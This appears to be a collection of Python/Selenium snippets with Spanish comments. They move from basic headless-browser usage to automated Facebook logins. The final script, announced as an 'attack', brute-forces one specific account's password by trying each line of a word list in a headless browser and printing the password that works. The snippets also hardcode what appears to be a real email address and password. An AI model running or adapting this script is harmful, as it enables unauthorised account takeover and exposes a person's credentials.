href="/friends/"


-------------------------------------------------------------------------------------------------------

# Inicializa el navegador
driver = webdriver.Firefox()

# Imprimir el código fuente de la página actual
print(driver.page_source)

### Enviar datos al input que contiene id email ###
element = driver.find_element(By.ID, "email")

### selenium en modo hadless (OCULTO NAVEGADOR FIREFOX SIN INTERFAZ) ###
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("--headless")  # Asegúrate de que esta línea esté presente
driver = webdriver.Firefox(options=options)

# Retroceder a la página anterior
driver.back()

-------------------------------------------------------------------------------------------------------

### ESTE ABRE FACEBOOK E INTRODUCE EL EMAIL Y LA CLAVE Y PRESIONA EL BOTON PARA INGRESAR ####

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
import time

user_name = 'danielaruizx159@gmail.com'
password = 'Killah2024xyz$$'
driver = webdriver.Firefox()
driver.get("https://www.facebook.com")
time.sleep(2)
element = driver.find_element(By.ID, "email")
element.send_keys(user_name)
element = driver.find_element(By.ID, "pass")
element.send_keys(password)
element.send_keys(Keys.RETURN)
# time.sleep(5)
# driver.close()


-------------------------------------------------------------------------------------------------------



























### INGRESAR A UNA CUENTA DE FACEBOOK ###
import time
from bs4 import BeautifulSoup as b
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
user_name = 'danielaruizx159@gmail.com'
password = 'Killah2024xyz$$'

options = Options()
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)

driver.get("https://www.facebook.com")
time.sleep(2)
element = driver.find_element(By.ID, "email")
element.send_keys(user_name)
element = driver.find_element(By.ID, "pass")
element.send_keys(password)
element.send_keys(Keys.RETURN)
time.sleep(20)
page = driver.page_source
soup = b(page, 'html.parser')
span_element = soup.find('span', class_='_akzt')
if span_element:
    print("DATOS INCORRECTOS")
else:
    print("LOS DATOS DE ACCESO SON CORRECTOS")





import time, sys, os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options

options = Options()
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)
driver.get("https://www.facebook.com")
time.sleep(2)


def send(user_name, password):
	element = driver.find_element(By.ID, "email")
	element.send_keys(user_name)
	element = driver.find_element(By.ID, "pass")
	element.send_keys(password)
	element.send_keys(Keys.RETURN)
	time.sleep(20)
	page = driver.page_source
	line_count = len(page.splitlines())
	if line_count < 35:
		return False
	else:
		return True

print('INICIANDO ATAQUE ... \n')

user_name = 'danielaruizx159@gmail.com'

with open('credenciales.txt', 'r') as f:
	v=f.readlines()
	for i in v:
		password = i.replace('\n', '')
		state = send(user_name, password)
		if state == True:
			print(f"CLAVE EXITOSA => {password}")
			sys.exit()
		else:
			print(f"CLAVE INCORRECTA => {password}")
			driver.back()
			time.sleep(7)

driver.close()

